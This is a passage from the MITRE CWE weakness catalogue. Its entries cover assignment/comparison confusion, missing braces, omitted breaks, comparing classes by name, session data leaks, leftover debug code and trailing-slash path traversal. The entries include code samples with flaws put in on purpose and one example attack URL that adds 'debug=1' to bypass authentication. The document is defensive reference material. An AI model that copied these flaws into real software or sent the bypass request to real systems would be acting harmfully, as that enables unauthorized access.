true;}Console.WriteLine("Value is not valid.");return false;} + + However, the expression to be evaluated in the if statement uses the assignment operator "=" rather than the comparison operator "==". The result of using the assignment operator instead of the comparison operator causes the int variable to be reassigned locally and the expression in the if statement will always evaluate to the value on the right hand side of the expression. This will result in the input value not being properly validated, which can cause unexpected results. + + + In this example, we show how assigning instead of comparing can impact code when values are being passed by reference instead of by value. Consider a scenario in which a string is being processed from user input. Assume the string has already been formatted such that different user inputs are concatenated with the colon character. When the processString function is called, the test for the colon character will result in an insertion of the colon character instead, adding new input separators. Since the string was passed by reference, the data sentinels will be inserted in the original string (CWE-464), and further processing of the inputs will be altered, possibly malformed.. + + void processString (char *str) { + int i; + for(i=0; i<strlen(str); i++) {if (isalnum(str[i])){processChar(str[i]);}else if (str[i] = ':') {movingToNewInput();}}} + } + + + + The following Java example attempts to perform some processing based on the boolean value of the input parameter. However, the expression to be evaluated in the if statement uses the assignment operator "=" rather than the comparison operator "==". As with the previous examples, the variable will be reassigned locally and the expression in the if statement will evaluate to true and unintended processing may occur. + + public void checkValid(boolean isValid) {if (isValid = true) {System.out.println("Performing processing");doSomethingImportant();}else {System.out.println("Not Valid, do not perform processing");return;}} + + While most Java compilers will catch the use of an assignment operator when a comparison operator is required, for boolean variables in Java the use of the assignment operator within an expression is allowed. If possible, try to avoid using comparison operators on boolean variables in java. Instead, let the values of the variables stand for themselves, as in the following code. + + public void checkValid(boolean isValid) {if (isValid) {System.out.println("Performing processing");doSomethingImportant();}else {System.out.println("Not Valid, do not perform processing");return;}} + + Alternatively, to test for false, just use the boolean NOT operator. + + public void checkValid(boolean isValid) {if (!isValid) {System.out.println("Not Valid, do not perform processing");return;}System.out.println("Performing processing");doSomethingImportant();} + + + + The following example demonstrates the weakness. + + void called(int foo){if (foo=1) printf("foo\n");}int main() { + + called(2);return 0; + } + + + + + + Assigning instead of comparing + + + SFP1 + Glitch in computation + + + EXP45-C + Do not perform assignments in selection statements + CWE More Abstract + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Description, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code uses an operator for comparison when the intention was to perform an assignment. + In many languages, the compare statement is very close in appearance to the assignment statement; they are often confused. + + + + + + + + + + Implementation + This bug primarily originates from a typo. + + + Low + + + Availability + Integrity + Unexpected State + The assignment will not take place, which should cause obvious program execution problems. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Testing + Many IDEs and static analysis products will detect this problem. + + + + + The following example demonstrates the weakness. + + void called(int foo) {foo==1;if (foo==1) System.out.println("foo\n");}int main() { + + called(2);return 0; + } + + + + The following C/C++ example shows a simple implementation of a stack that includes methods for adding and removing integer values from the stack. The example uses pointers to add and remove integer values to the stack array variable. + + #define SIZE 50int *tos, *p1, stack[SIZE]; + void push(int i) { + p1++;if(p1==(tos+SIZE)) { + + + // Print stack overflow error message and exit + + + }*p1 == i; + } + int pop(void) { + if(p1==tos) { + + + // Print stack underflow error message and exit + + + }p1--;return *(p1+1); + } + int main(int argc, char *argv[]) { + + + // initialize tos and p1 to point to the top of stack + tos = stack;p1 = stack; + // code to add and remove items from stack + ...return 0; + } + + The push method includes an expression to assign the integer value to the location in the stack pointed to by the pointer variable. + However, this expression uses the comparison operator "==" rather than the assignment operator "=". The result of using the comparison operator instead of the assignment operator causes erroneous values to be entered into the stack and can cause unexpected results. + + + + + Comparing instead of assigning + + + SFP2 + Unused Entities + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Description, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Common_Consequences, Modes_of_Introduction + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code does not explicitly delimit a block that is intended to contain 2 or more statements, creating a logic error. + In some languages, braces (or other delimiters) are optional for blocks. When the delimiter is omitted, it is possible to insert a logic error in which a statement is thought to be in a block but is not. In some cases, the logic error can have security implications. + + + + + + Primary + + + Indirect + + + + + + + + + Implementation + + + Low + + + Confidentiality + Integrity + Availability + Alter Execution Logic + This is a general logic error which will often lead to obviously-incorrect behaviors that are quickly noticed and fixed. In lightly tested or untested code, this error may be introduced it into a production environment and provide additional attack vectors by creating a control flow path leading to an unexpected state in the application. The consequences will depend on the types of behaviors that are being incorrectly executed. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Always use explicit block delimitation and use static-analysis technologies to enforce this practice. + + + + + In this example, the programmer has indented the statements to call Do_X() and Do_Y(), as if the intention is that these functions are only called when the condition is true. However, because there are no braces to signify the block, Do_Y() will always be executed, even if the condition is false. + + if (condition==true)Do_X();Do_Y(); + + + This might not be what the programmer intended. When the condition is critical for security, such as in making a security decision or detecting a critical error, this may produce a vulnerability. + + + In this example, the programmer has indented the Do_Y() statement as if the intention is that the function should be associated with the preceding conditional and should only be called when the condition is true. However, because Do_X() was called on the same line as the conditional and there are no braces to signify the block, Do_Y() will always be executed, even if the condition is false. + + if (condition==true) Do_X();Do_Y(); + + + This might not be what the programmer intended. When the condition is critical for security, such as in making a security decision or detecting a critical error, this may produce a vulnerability. + + + + + CVE-2014-1266 + incorrect indentation of "goto" statement makes it more difficult to detect an incorrect goto (Apple's "goto fail") + https://www.cve.org/CVERecord?id=CVE-2014-1266 + + + + + Incorrect block delimitation + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2010-06-21 + updated Demonstrative_Examples, Description, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Observed_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships, Type + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Michael Koo and Paul Black + NIST + 2010-04-28 + Correction to Demonstrative Examples + + + + + The product omits a break statement within a switch or similar construct, causing code associated with multiple conditions to execute. This can cause problems when the programmer only intended to execute code associated with one condition. + This can lead to critical code executing in situations where it should not. + + + + + + + Primary + + + Indirect + + + + + + + + + + + + Implementation + + + Medium + + + Other + Alter Execution Logic + This weakness can cause unintended logic to be executed and other unexpected application behavior. + + + + + White Box + Omission of a break statement might be intentional, in order to support fallthrough. Automated detection methods might therefore be erroneous. Semantic understanding of expected product behavior is required to interpret whether the code is correct. + + + Black Box + Since this weakness is associated with a code construct, it would be indistinguishable from other errors that produce the same behavior. + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Omitting a break statement so that one may fall through is often indistinguishable from an error, and therefore should be avoided. If you need to use fall-through capabilities, make sure that you have clearly documented this within the switch statement, and ensure that you have examined all the logical possibilities. + + + Implementation + The functionality of omitting a break statement could be clarified with an if statement. This method is much safer. + + + + + In both of these examples, a message is printed based on the month passed into the function: + + public void printMessage(int month){ + switch (month) { + + case 1: print("January");case 2: print("February");case 3: print("March");case 4: print("April");case 5: print("May");case 6: print("June");case 7: print("July");case 8: print("August");case 9: print("September");case 10: print("October");case 11: print("November");case 12: print("December"); + }println(" is a great month"); + } + + + void printMessage(int month){ + switch (month) { + + case 1: printf("January");case 2: printf("February");case 3: printf("March");case 4: printf("April");case 5: printff("May");case 6: printf("June");case 7: printf("July");case 8: printf("August");case 9: printf("September");case 10: printf("October");case 11: printf("November");case 12: printf("December"); + }printf(" is a great month"); + } + + Both examples do not use a break statement after each case, which leads to unintended fall-through behavior. For example, calling "printMessage(10)" will result in the text "OctoberNovemberDecember is a great month" being printed. + + + + + Omitted break statement + + + SFP4 + Unchecked Status Condition + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Description, Detection_Factors, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Applicable_Platforms, Demonstrative_Examples, Description, Detection_Factors, Name, Other_Notes, Potential_Mitigations, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Detection_Factors + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Omitted Break Statement + + + + The product compares classes by name, which can cause it to use the wrong class when multiple classes can have the same name. + If the decision to trust the methods and data of an object is based on the name of a class, it is possible for malicious users to send objects of the same name as trusted classes and thereby gain the trust afforded to known classes and types. + + + + + + + + + Implementation + + + High + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + If a product relies solely on the name of an object to determine identity, it may execute the incorrect or unintended code. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Use class equivalency to determine type. Rather than use the class name to determine if an object is of a given type, use the getClass() method, and == operator. + + + + + In this example, the expression in the if statement compares the class of the inputClass object to a trusted class by comparing the class names. + + if (inputClass.getClass().getName().equals("TrustedClassName")) { + + + // Do something assuming you trust inputClass + + + // ... + + + } + + However, multiple classes can have the same name therefore comparing an object's class by name can allow untrusted classes of the same name as the trusted class to be use to execute unintended or incorrect code. To compare the class of an object to the intended class the getClass() method and the comparison operator "==" should be used to ensure the correct trusted class is used, as shown in the following example. + + if (inputClass.getClass() == TrustedClass.class) { + + + // Do something assuming you trust inputClass + + + // ... + + + } + + + + In this example, the Java class, TrustedClass, overrides the equals method of the parent class Object to determine equivalence of objects of the class. The overridden equals method first determines if the object, obj, is the same class as the TrustedClass object and then compares the object's fields to determine if the objects are equivalent. + + public class TrustedClass { + ... + @Overridepublic boolean equals(Object obj) { + boolean isEquals = false; + + // first check to see if the object is of the same class + if (obj.getClass().getName().equals(this.getClass().getName())) { + + + // then compare object fields + ...if (...) {isEquals = true;} + } + return isEquals; + } + ... + } + + However, the equals method compares the class names of the object, obj, and the TrustedClass object to determine if they are the same class. As with the previous example using the name of the class to compare the class of objects can lead to the execution of unintended or incorrect code if the object passed to the equals method is of another class with the same name. To compare the class of an object to the intended class, the getClass() method and the comparison operator "==" should be used to ensure the correct trusted class is used, as shown in the following example. + + public boolean equals(Object obj) { + ... + + // first check to see if the object is of the same class + if (obj.getClass() == this.getClass()) {...} + ... + } + + + + + + Comparing Classes by Name + + + Comparing classes by name + + + OBJ09-J + Compare classes and not class names + + + SFP1 + Glitch in computation + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Description, Relationships, Other_Notes, Relevant_Properties, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Other_Notes + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships, Relevant_Properties + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Comparing Classes by Name + + + + Java packages are not inherently closed; therefore, relying on them for code security is not a good practice. + The purpose of package scope is to prevent accidental access by other parts of a program. This is an ease-of-software-development feature but not a security feature. + + + + + + + + + Implementation + + + Medium + + + Confidentiality + Read Application Data + Any data in a Java package can be accessed outside of the Java framework if the package is distributed. + + + Integrity + Modify Application Data + The data in a Java class can be modified by anyone outside of the Java framework if the packages is distributed. + + + + + Architecture and Design + Implementation + Data should be private static and final whenever possible. This will assure that your code is protected by instantiating early, preventing access and tampering. + + + + + The following example demonstrates the weakness. + + package math;public class Lebesgue implements Integration{ + public final Static String youAreHidingThisFunction(functionToIntegrate){ + + return ...; + } + } + + + + + + Relying on package-level scope + + + MET04-J + Do not increase the accessibility of overridden or hidden methods + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Type + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Relying on Package-level Scope + + + + The product does not sufficiently enforce boundaries between the states of different sessions, causing data to be provided to, or used by, the wrong session. + + Data can "bleed" from one session to another through member variables of singleton objects, such as Servlets, and objects from a shared pool. + In the case of Servlets, developers sometimes do not understand that, unless a Servlet implements the SingleThreadModel interface, the Servlet is a singleton; there is only one instance of the Servlet, and that single instance is used and re-used to handle multiple requests that are processed simultaneously by different threads. A common result is that developers use Servlet member fields in such a way that one user may inadvertently see another user's data. In other words, storing user data in Servlet member fields introduces a data access race condition. + + + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Confidentiality + Read Application Data + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Protect the application's sessions from information leakage. Make sure that a session's data is not used or visible by other sessions. + + + Testing + Use a static analysis tool to scan the code for information leakage vulnerabilities (e.g. Singleton Member Field). + + + Architecture and Design + In a multithreading environment, storing user data in Servlet member fields introduces a data access race condition. Do not use member fields to store information in the Servlet. + + + + + The following Servlet stores the value of a request parameter in a member field and then later echoes the parameter value to the response output stream. + + public class GuestBook extends HttpServlet { + String name; + protected void doPost (HttpServletRequest req, HttpServletResponse res) {name = req.getParameter("name");...out.println(name + ", thanks for visiting!");} + } + + While this code will work perfectly in a single-user environment, if two users access the Servlet at approximately the same time, it is possible for the two request handler threads to interleave in the following way: Thread 1: assign "Dick" to name Thread 2: assign "Jane" to name Thread 1: print "Jane, thanks for visiting!" Thread 2: print "Jane, thanks for visiting!" Thereby showing the first user the second user's name. + + + + + Data Leaking Between Users + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships, Type + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Data Leaking Between Users + Data Leak Between Sessions + + + + The product is deployed to unauthorized actors with debugging code still enabled or active, which can create unintended entry points or expose sensitive information. + A common development practice is to add "back door" code specifically designed for debugging or testing purposes that is not intended to be shipped or deployed with the product. These back door entry points create security risks because they are not considered during design or testing and fall outside of the expected operating conditions of the product. + + + + + + + Indirect + + + Primary + + + + + + + + + + Leftover debug code + This term originates from Seven Pernicious Kingdoms + + + + + Implementation + In web-based applications, debug code is used to test and modify web application properties, configuration information, and functions. If a debug application is left on a production server, this oversight during the "software process" allows attackers access to debug functionality. + + + Build and Compilation + + + Operation + + + + + Confidentiality + Integrity + Availability + Access Control + Other + Bypass Protection Mechanism + Read Application Data + Gain Privileges or Assume Identity + Varies by Context + The severity of the exposed debug application will depend on the particular instance. At the least, it will give an attacker sensitive information about the settings and mechanics of web applications on the server. At worst, as is often the case, the debug application will allow an attacker complete control over the web application and server, as well as confidential information that either of these access. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Build and Compilation + Distribution + Remove debug code before deploying the application. + + + + + Debug code can be used to bypass authentication. For example, suppose an application has a login script that receives a username and a password. Assume also that a third, optional, parameter, called "debug", is interpreted by the script as requesting a switch to debug mode, and that when this parameter is given the username and password are not checked. In such a case, it is very simple to bypass the authentication process if the special behavior of the application regarding the debug parameter is known. In a case where the form is: + + <FORM ACTION="/authenticate_login.cgi"><INPUT TYPE=TEXT name=username><INPUT TYPE=PASSWORD name=password><INPUT TYPE=SUBMIT></FORM> + + Then a conforming link will look like: + + http://TARGET/authenticate_login.cgi?username=...&password=... + + An attacker can change this to: + + http://TARGET/authenticate_login.cgi?username=&password=&debug=1 + + Which will grant the attacker access to the site, bypassing the authentication process. + + + + + Leftover Debug Code + + + A10 + Insecure Configuration Management + CWE More Specific + + + SFP28 + Unexpected access points + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + In J2EE a main method may be a good indicator that debug code has been left in the application, although there may not be any direct security impact. + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Modes_of_Introduction, Other_Notes, Time_of_Introduction + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Relationships, White_Box_Definitions + + + CWE Content Team + MITRE + 2019-01-03 + updated Weakness_Ordinalities + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, References, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-07-20 + updated Alternate_Terms + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Description, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Leftover Debug Code + + + + The product accepts path input in the form of trailing slash ('filedir/') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. + + + + + + + + + + Implementation + + + Operation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + CVE-2002-0253 + Overlaps infoleak + https://www.cve.org/CVERecord?id=CVE-2002-0253 + + + CVE-2001-0446 + Application server allows remote attackers to read source code for .jsp files by appending a / to the requested URL. + https://www.cve.org/CVERecord?id=CVE-2001-0446 + + + CVE-2004-0334 + Bypass Basic Authentication for files using trailing "/" + https://www.cve.org/CVERecord?id=CVE-2004-0334 + + + CVE-2001-0893 + Read sensitive files with trailing "/" + https://www.cve.org/CVERecord?id=CVE-2001-0893 + + + CVE-2001-0892 + Web server allows remote attackers to view sensitive files under the document root (such as .htpasswd) via a GET request with a trailing /. + https://www.cve.org/CVERecord?id=CVE-2001-0892 + + + CVE-2004-1814 + Directory traversal vulnerability in server allows remote attackers to read protected files via .. (dot dot) sequences in an HTTP request. + https://www.cve.org/CVERecord?id=CVE-2004-1814 + + + BID:3518 + Source code disclosure + http://www.securityfocus.com/bid/3518 + + + + + filedir/ (trailing slash, trailing /) + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Observed_Examples + + + CWE Content Team + MITRE + 2010-12-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Trailing Slash - filedir/ + + + + A class has a cloneable() method that is not 